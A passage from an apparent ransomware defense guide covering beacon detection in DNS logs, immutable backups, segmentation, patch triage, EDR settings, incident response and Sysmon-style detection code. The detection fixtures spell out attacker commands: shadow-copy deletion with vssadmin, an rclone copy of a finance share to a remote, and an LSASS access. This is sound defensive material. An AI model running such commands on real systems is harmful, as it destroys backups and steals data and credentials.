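import math
from collections import Counter

LABEL_LENGTH_THRESHOLD = 25   # the SPL's len(query) > 25, applied to the label
ENTROPY_THRESHOLD = 3.5       # bits per character, as in the SPL
QUERY_COUNT_THRESHOLD = 10    # the SPL's count > 10 per (query, src)


def shannon_entropy(text):
    """Bits of entropy per character of `text`; 0.0 for empty or single-symbol input."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def leftmost_label(query):
    return query.strip(".").split(".")[0]


def parse_dns_log(text):
    """Constructed records, one per line: '<ts> <src ip> <query name>'."""
    records = []
    for line in text.splitlines():
        if line.strip() and not line.startswith("#"):
            ts, src, query = line.split()[:3]
            records.append((ts, src, query.lower()))
    return records


def constructed_dns_log():
    lines = ["# ts src query   (constructed sample)"]
    # Ordinary corporate name resolved often by many hosts: long, but low-entropy label.
    for i in range(30):
        lines.append(f"1709283600.{i:03d} 10.1.0.{20 + i % 5} fileserver01.corp.example-company.com")
    # CDN-style hashed hostname: high-entropy label, but only resolved twice.
    for i in range(2):
        lines.append(f"1709283700.{i:03d} 10.1.0.25 d1a2b3c4d5e6f7g8h9i0j1k2l3m4.cdn-example.net")
    # Beacon-like: long random label, 12 lookups from one workstation.
    for i in range(12):
        lines.append(f"1709283800.{i:03d} 10.1.0.77 x7k2q9pw4m1zr8tf5ya3bc6vdnhj.update-cdn.xyz")
    return "\n".join(lines)


def find_beacon_candidates(records, length=LABEL_LENGTH_THRESHOLD,
                           entropy=ENTROPY_THRESHOLD, min_count=QUERY_COUNT_THRESHOLD):
    """Apply the SPL's three filters per (query, src) pair and return the survivors."""
    counts = Counter((query, src) for _, src, query in records)
    hits = []
    for (query, src), n in counts.items():
        label = leftmost_label(query)
        ent = shannon_entropy(label)
        if len(label) > length and ent > entropy and n > min_count:
            hits.append({"query": query, "src": src, "count": n,
                         "label_entropy": round(ent, 3)})
    return sorted(hits, key=lambda h: -h["count"])


if __name__ == "__main__":
    for h in find_beacon_candidates(parse_dns_log(constructed_dns_log())):
        print(f"{h['src']} -> {h['query']} x{h['count']} (entropy {h['label_entropy']})")
```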
Defense Architecture
The 3-2-1-1-0 Backup Rule
The standard 3-2-1 rule (3 copies, 2 media types, 1 offsite) is insufficient against modern ransomware. The extended 3-2-1-1-0 rule:
3 - Three copies of data
2 - Two different storage media types
1 - One copy offsite
1 - One copy offline or air-gapped (ransomware cannot reach it)
0 - Zero backup errors after tested restores
The "1 offline" addition is the critical change. Ransomware operators specifically target backup infrastructure. Veeam, Commvault, and Veritas servers are high-priority targets during the reconnaissance phase — compromised backup infrastructure means the victim cannot recover without paying.
Offline backups:
- Tape backups physically removed from the environment
- Object storage with immutability enabled (AWS S3 Object Lock, Azure Blob immutable storage)
- Write-once media
- Backups to a completely separate AWS account or Azure subscription with no credentials accessible from the production environment
```shell
# AWS S3 Object Lock — immutable backup storage
aws s3api put-object-lock-configuration \
    --bucket my-backup-bucket \
    --object-lock-configuration \
    '{"ObjectLockEnabled":"Enabled","Rule":{"DefaultRetention":{"Mode":"COMPLIANCE","Days":90}}}'
# Backups written to this bucket cannot be deleted for 90 days
# even by the root account in COMPLIANCE mode
```

Test restores: Veeam's 2024 Data Protection Trends Report found that 75% of organizations experienced at least one backup restore failure in 2023. Test quarterly. Automated restore testing (spin up restored VM, verify service health, destroy) is achievable with most modern backup platforms.
Network Segmentation
Flat networks are the ransomware operator's best friend. A compromised accounting workstation in a flat network has direct connectivity to the domain controller, backup servers, and production databases. The same workstation in a properly segmented network cannot reach any of those directly.
```text
# Minimum viable segmentation:
Workstation VLAN → Cannot initiate connections to Server VLAN (only established/related)
Server VLAN      → Restricted outbound internet (proxy required, not direct)
DC VLAN          → No direct workstation access; only management jump server
Backup VLAN      → No inbound connections except from backup server itself
DMZ              → No access to internal VLANs
Management VLAN  → PAM (privileged access workstation) required for admin
```

Implementation via ACL (Cisco IOS example; extended ACLs take wildcard masks rather than CIDR prefixes, and comments belong on remark lines, not after a command):

```text
ip access-list extended WORKSTATION_VLAN_OUT
 remark Block workstations reaching servers directly
 deny ip 10.1.0.0 0.0.0.255 10.2.0.0 0.0.0.255 log
 remark Block workstations reaching DCs
 deny ip 10.1.0.0 0.0.0.255 10.3.0.0 0.0.0.255 log
 remark Allow internet via proxy
 permit ip 10.1.0.0 0.0.0.255 any
```
Patch Management Prioritization
Given the 5-day exploitation window for critical perimeter vulnerabilities, patch management must prioritize by exposure and severity:
Priority 1 (patch within 24-48 hours):
- Internet-facing VPN appliances (Fortinet, Palo Alto, Pulse/Ivanti, SonicWall)
- Internet-facing web applications with RCE vulnerabilities
- Remote Desktop Gateway / Citrix / VMware Horizon
Priority 2 (patch within 7 days):
- Internal systems with network-accessible RCE vulnerabilities
- Domain controllers for privilege escalation CVEs
- Backup servers
Priority 3 (standard patching cycle, 30 days):
- Non-critical internal systems
- Workstation OS updates
Tools:
- Tenable/Qualys for continuous vulnerability scanning
- Microsoft MSRC API for automated patch priority feeds
- CISA KEV (Known Exploited Vulnerabilities catalog) as mandatory patch triggers
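The three priority tiers above, driven by a CISA KEV-style feed: a KEV entry is the mandatory trigger, and the asset's exposure and role choose the deadline. This is an added example, not the page's or CISA's code. The KEV records and the asset inventory are constructed samples that reuse KEV's field names (cveID, vendorProject, product, dateAdded) and the CVE numbers already discussed on this page; the dateAdded values and host names are illustrative.

```python
"""Patch-priority triage for the tiers listed above, driven by a CISA KEV-style
feed. Added example, not the page's or CISA's code. KEV records and assets are
constructed samples; field names follow the KEV JSON feed."""
from datetime import date, timedelta

# Hours allowed after a CVE lands in KEV, per priority tier from the text.
SLA_HOURS = {1: 48, 2: 7 * 24, 3: 30 * 24}
PRIORITY_2_ROLES = {"domain-controller", "backup"}

# Constructed KEV-style records (dateAdded values are illustrative).
KEV_SAMPLE = {"vulnerabilities": [
    {"cveID": "CVE-2024-3400", "vendorProject": "Palo Alto Networks",
     "product": "PAN-OS", "dateAdded": "2024-04-12"},
    {"cveID": "CVE-2023-4966", "vendorProject": "Citrix",
     "product": "NetScaler ADC and NetScaler Gateway", "dateAdded": "2023-10-18"},
    {"cveID": "CVE-2021-34527", "vendorProject": "Microsoft",
     "product": "Windows Print Spooler", "dateAdded": "2021-11-03"},
]}

# Constructed inventory. "products" are lower-case substrings matched against
# the KEV vendor/product text; "network_rce" marks an internal host whose
# vulnerable service is reachable from the network (the text's Priority 2 case).
ASSETS = [
    {"host": "vpn01",   "role": "vpn",               "internet_facing": True,  "products": ["pan-os"]},
    {"host": "ns-gw01", "role": "remote-access",     "internet_facing": True,  "products": ["netscaler"]},
    {"host": "dc01",    "role": "domain-controller", "internet_facing": False, "products": ["windows"]},
    {"host": "bkp01",   "role": "backup",            "internet_facing": False, "products": ["windows"]},
    {"host": "ws042",   "role": "workstation",       "internet_facing": False, "products": ["windows"]},
]


def priority_for(asset):
    """Map an affected asset to the text's tiers: 1 = 24-48h, 2 = 7 days, 3 = 30 days."""
    if asset["internet_facing"]:
        return 1                      # perimeter appliance or any exposed service
    if asset["role"] in PRIORITY_2_ROLES or asset.get("network_rce", False):
        return 2
    return 3


def affected_assets(kev_entry, assets):
    haystack = f"{kev_entry['vendorProject']} {kev_entry['product']}".lower()
    return [a for a in assets if any(p in haystack for p in a["products"])]


def build_patch_plan(assets, kev_feed, today):
    """One row per (host, CVE) pair, sorted by priority, then deadline, then host."""
    plan = []
    for entry in kev_feed["vulnerabilities"]:
        added = date.fromisoformat(entry["dateAdded"])
        for asset in affected_assets(entry, assets):
            pri = priority_for(asset)
            due = added + timedelta(hours=SLA_HOURS[pri])
            plan.append({"host": asset["host"], "cve": entry["cveID"], "priority": pri,
                         "kev_added": added, "due": due, "overdue": today > due})
    plan.sort(key=lambda r: (r["priority"], r["due"], r["host"]))
    return plan


if __name__ == "__main__":
    for row in build_patch_plan(ASSETS, KEV_SAMPLE, date.today()):
        flag = "OVERDUE" if row["overdue"] else "ok"
        print(f"P{row['priority']} {row['host']:8} {row['cve']:15} due {row['due']} {flag}")
```

Feeding the real KEV JSON in place of KEV_SAMPLE only requires that the inventory's product substrings match CISA's vendor/product wording.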
EDR and Ransomware-Specific Controls
Modern EDR platforms (CrowdStrike Falcon, SentinelOne Singularity, Microsoft Defender for Endpoint) have ransomware-specific capabilities that go beyond traditional AV:
CrowdStrike Falcon:
- Ransomware File Encryption Protection: detects and blocks mass file encryption
- Memory protection: blocks process injection techniques
- Machine learning: behavioral detection of novel ransomware
SentinelOne:
- Rollback: automatically reverts encrypted files from Volume Shadow Copy if ransomware is detected
- Storyline: AI-based attack visualization showing full kill chain
Microsoft Defender for Endpoint:
- Controlled Folder Access: prevents unauthorized processes from modifying files in protected folders
- Attack Surface Reduction rules: block specific ransomware-associated behaviors
```powershell
# Enable Controlled Folder Access:
Set-MpPreference -EnableControlledFolderAccess Enabled
# Add protected folders:
Add-MpPreference -ControlledFolderAccessProtectedFolders "D:\Finance"
# Attack Surface Reduction rule — block Office applications (including macro code)
# from spawning child processes. Add-MpPreference appends to the configured rules;
# Set-MpPreference -AttackSurfaceReductionRules_Ids would replace every ASR rule
# already configured with just this one.
Add-MpPreference -AttackSurfaceReductionRules_Ids D4F940AB-401B-4EFC-AADC-AD5F3C50688A -AttackSurfaceReductionRules_Actions Block
```
Response Playbook When You're Hit
The first minutes after ransomware discovery are the highest-leverage window. The decisions made in that window determine whether you recover in days or months.
Immediate Response (0-30 minutes)
1. CONFIRM — do not assume; verify encryption is actually occurring
   - Check file extensions in known-good directories
   - Check ransom note locations
2. DO NOT SHUT DOWN infected hosts immediately
   - Memory forensics artifacts (running processes, network connections, decryption keys in RAM) are lost at power-off
   - If a decryption key exists in memory, imaging RAM preserves it
3. ISOLATE via network disconnection, not power-off
   - Pull network cable / disable NIC (Device Manager → disable)
   - EDR host isolation if available: CrowdStrike "Contain Host" / SentinelOne "Isolate"
   - Firewall ACL to block host-to-host communication
4. PRESERVE — do not wipe before imaging
   - Memory capture: WinPmem for Windows, LiME for Linux
   - Disk image: FTK Imager, dd
   - Network packet capture if still active: Wireshark
5. ASSESS SCOPE — which hosts are affected?
   - EDR console: look for ransomware detection events across all endpoints
   - SIEM: search for vssadmin execution, file encryption activity in past 24-72 hours
6. NOTIFY — activate your IR plan
   - Internal: CISO, legal, executives
   - External: incident response retainer (if you have one), cyber insurance carrier
   - Government: CISA (1-888-282-0870, CISA.gov/report), FBI (ic3.gov)
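As an added example for step 1 (CONFIRM), and not code from the original article: a Python triage script that walks a known-good directory and reports the indicators the step lists (ransom-note filenames, a foreign extension appended to a known-good one) plus a byte-entropy check as a generalization. The note names, expected extensions, threshold and sample files are constructed placeholders.

```python
import math
import random
import tempfile
from collections import Counter
from pathlib import Path

# Constructed placeholders (not from the article); keep your own note-name and extension lists.
RANSOM_NOTE_NAMES = {"readme.txt", "how_to_decrypt.txt", "restore_files.html"}
KNOWN_GOOD_EXTENSIONS = {".docx", ".xlsx", ".pdf", ".txt", ".csv"}
ENTROPY_THRESHOLD = 7.5  # bits per byte; encrypted data sits close to 8.0

def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte; random (encrypted) content approaches 8.0."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0

def triage_directory(root: str, sample_bytes: int = 4096) -> dict:
    """Collect step 1's indicators: ransom notes, foreign extensions appended to known-good ones, high entropy."""
    result = {"total": 0, "renamed": [], "high_entropy": [], "notes": []}
    for path in Path(root).rglob("*"):
        if not path.is_file():
            continue
        result["total"] += 1
        if path.name.lower() in RANSOM_NOTE_NAMES:
            result["notes"].append(str(path))
            continue
        sfx = [s.lower() for s in path.suffixes]  # "invoice.docx.locked" -> [".docx", ".locked"]
        if len(sfx) >= 2 and sfx[-2] in KNOWN_GOOD_EXTENSIONS and sfx[-1] not in KNOWN_GOOD_EXTENSIONS:
            result["renamed"].append(str(path))
        with path.open("rb") as fh:
            head = fh.read(sample_bytes)  # sampling the head is enough and keeps large files cheap
        # Compressed formats (zip, jpg, docx) are high-entropy too: only meaningful with the rename check.
        if len(head) >= 256 and shannon_entropy(head) >= ENTROPY_THRESHOLD:
            result["high_entropy"].append(str(path))
    return result

def encryption_confirmed(result: dict, min_ratio: float = 0.5) -> bool:
    """True if a ransom note is present or most files carry both indicators."""
    if result["notes"]:
        return True
    both = set(result["renamed"]) & set(result["high_entropy"])
    return result["total"] > 0 and len(both) / result["total"] >= min_ratio

def demo() -> dict:
    """Triage a constructed sample tree: one clean file, one 'encrypted' file, one note."""
    root = Path(tempfile.mkdtemp(prefix="triage_demo_"))
    rng = random.Random(1)  # seeded so the constructed ciphertext stand-in is reproducible
    (root / "memo.txt").write_bytes(b"quarterly figures attached\n" * 40)
    (root / "invoice.docx.locked").write_bytes(bytes(rng.getrandbits(8) for _ in range(4096)))
    (root / "HOW_TO_DECRYPT.txt").write_text("your files are encrypted")
    return triage_directory(str(root))
```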
RAM Capture Commands
# WinPmem — Windows memory acquisition
# Download: https://github.com/Velocidex/WinPmem/releases
winpmem_mini_x64_rc2.exe memdump.raw
# Alternative: Magnet RAM Capture (GUI)
# https://www.magnetforensics.com/resources/magnet-ram-capture/
# For analysis with Volatility3:
vol -f memdump.raw windows.pslist # Process list
vol -f memdump.raw windows.netscan # Network connections
vol -f memdump.raw windows.malfind # Suspicious injected memory
vol -f memdump.raw windows.cmdline # Command line arguments per process
Before Paying: Check for Decryptors
No More Ransom Project: nomoreransom.org
- Law enforcement partnership (Europol, NHTCU, Kaspersky, McAfee)
- Free decryptors for: Conti (partial), REvil, Gandcrab, Locky, WannaCry (partial)
- Submit sample encrypted file to identify ransomware variant
Emsisoft Decryption Tools: emsisoft.com/en/ransomware-decryption/
- Free decryptors for dozens of variants
- Check after any law enforcement takedown — seized keys are often released
Coveware Ransomware Report:
- Tracks payment rates, decryption reliability by group
- 2023 data: decryptors work as advertised approximately 88% of the time when provided
- But: 17% of payers experience reinfection within 1 month
- And: paying marks you as a reliable payer in attacker records
Paying ransomware does not guarantee recovery. Decryptors are often slow (a 10TB file server taking 3 weeks to decrypt while business is stopped), occasionally corrupt large files, and sometimes fail entirely. One-third of organizations that pay are hit again within 30 days. The FBI explicitly recommends against payment. If you have tested, working backups, restore from backups — the recovery time is almost certainly shorter than the decryption process.
Ransomware Defense Checklist
Prevent Initial Access:
- [ ] MFA on all VPN, RDP gateway, and remote access systems — no exceptions
- [ ] Patch internet-facing systems within 48 hours of critical CVE disclosure
- [ ] Subscribe to CISA KEV feed and treat listed CVEs as emergency patches
- [ ] Disable RDP direct from internet; require VPN or zero-trust gateway
- [ ] Implement email security: DMARC reject, sandboxed attachment detonation
- [ ] Disable Office macros from the internet (Group Policy)
Limit Lateral Movement:
- [ ] Implement network segmentation (workstations cannot reach domain controllers directly)
- [ ] Disable NTLM v1 across the domain
- [ ] Enable Windows Credential Guard (prevents LSASS dumping)
- [ ] Deploy Local Administrator Password Solution (LAPS) — unique local admin passwords per host
- [ ] Limit who has Domain Admin; regular users should not be DAs
- [ ] Enable SMB signing to prevent relay attacks
Protect Backups:
- [ ] Implement 3-2-1-1-0 backup strategy
- [ ] Backups isolated from production network (separate credentials, no shared accounts)
- [ ] Test backup restores quarterly — automated testing preferred
- [ ] Enable object lock / immutability on cloud backup storage
Detect and Respond:
- [ ] Alert on: vssadmin delete shadows, LSASS access, mass SMB from single host, Rclone execution
- [ ] EDR deployed on all endpoints with ransomware-specific policies enabled
- [ ] IR plan documented and tested via tabletop exercise at least annually
- [ ] IR retainer in place (faster than cold-calling vendors during an incident)
- [ ] CISA relationship established (free IR assistance for critical infrastructure)
- [ ] Cyber insurance policy reviewed — understand what triggers coverage and what doesn't
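To make the "Alert on" item concrete, an added example that is not part of the original checklist: Python detection logic over constructed Sysmon-style events (EventID 1 process create, 3 network connect, 10 process access) that raises the four alerts named above. Hostnames, paths, the LSASS allowlist and the SMB fan-out threshold are constructed assumptions to tune for your own estate.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed allowlist and thresholds (tune to your estate); only the EDR sensor should touch LSASS.
LSASS_ALLOWLIST = {r"c:\program files\edr\sensor.exe"}
SMB_FANOUT, SMB_WINDOW = 20, timedelta(minutes=5)

def constructed_events() -> list:
    """Constructed Sysmon-style events (EventID 1/3/10), not real telemetry."""
    ev = [
        {"EventID": 1, "Computer": "WS-042", "Image": r"C:\Windows\System32\vssadmin.exe",
         "CommandLine": "vssadmin.exe delete shadows /all"},
        {"EventID": 1, "Computer": "WS-042", "Image": r"C:\Users\Public\x.exe",
         "OriginalFileName": "rclone.exe", "CommandLine": r"x.exe copy D:\Finance remote:b"},
        {"EventID": 10, "Computer": "WS-042", "SourceImage": r"C:\Users\Public\svc.exe",
         "TargetImage": r"C:\Windows\System32\lsass.exe"},
        {"EventID": 10, "Computer": "WS-007", "SourceImage": r"C:\Program Files\EDR\sensor.exe",
         "TargetImage": r"C:\Windows\System32\lsass.exe"},
    ]
    for i in range(25):  # one workstation reaching 25 distinct SMB peers within a minute
        ev.append({"EventID": 3, "Computer": "WS-042", "UtcTime": f"2024-03-02 03:02:{i:02d}",
                   "DestinationIp": f"10.0.5.{100 + i}", "DestinationPort": 445})
    return ev

def detect(events: list) -> list:
    """Return (rule, host, detail) tuples for the checklist's four alert conditions."""
    alerts, smb = [], defaultdict(list)
    for e in events:
        eid, host = e["EventID"], e["Computer"]
        if eid == 1:
            image, cmd = e["Image"].lower(), e.get("CommandLine", "").lower()
            if image.endswith("vssadmin.exe") and "delete" in cmd and "shadows" in cmd:
                alerts.append(("shadow_copy_deletion", host, e["CommandLine"]))
            # A renamed copy keeps its PE OriginalFileName, so match on that as well as the path
            elif image.endswith("rclone.exe") or e.get("OriginalFileName", "").lower() == "rclone.exe":
                alerts.append(("rclone_execution", host, e["CommandLine"]))
        elif eid == 10 and e["TargetImage"].lower().endswith("lsass.exe"):
            if e["SourceImage"].lower() not in LSASS_ALLOWLIST:
                alerts.append(("lsass_access", host, e["SourceImage"]))
        elif eid == 3 and e.get("DestinationPort") == 445:
            smb[host].append((datetime.strptime(e["UtcTime"], "%Y-%m-%d %H:%M:%S"), e["DestinationIp"]))
    for host, conns in smb.items():  # sliding window over time: distinct :445 peers per source host
        conns.sort()
        for i, (t0, _) in enumerate(conns):
            peers = {ip for t, ip in conns[i:] if t - t0 <= SMB_WINDOW}
            if len(peers) >= SMB_FANOUT:
                alerts.append(("smb_fanout", host, f"{len(peers)} distinct SMB peers in {SMB_WINDOW}"))
                break
    return alerts
```

In a SIEM these become four saved searches; the window logic is the one piece most rule languages make you express as a count-by-host-over-time aggregation.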
The attacker's operational cost for a ransomware deployment is now under $10,000 (IAB access + RaaS subscription + infrastructure). Their expected return is millions. Defenders who understand the kill chain can interrupt it at multiple points — but only if the controls are in place before the call at 3 AM.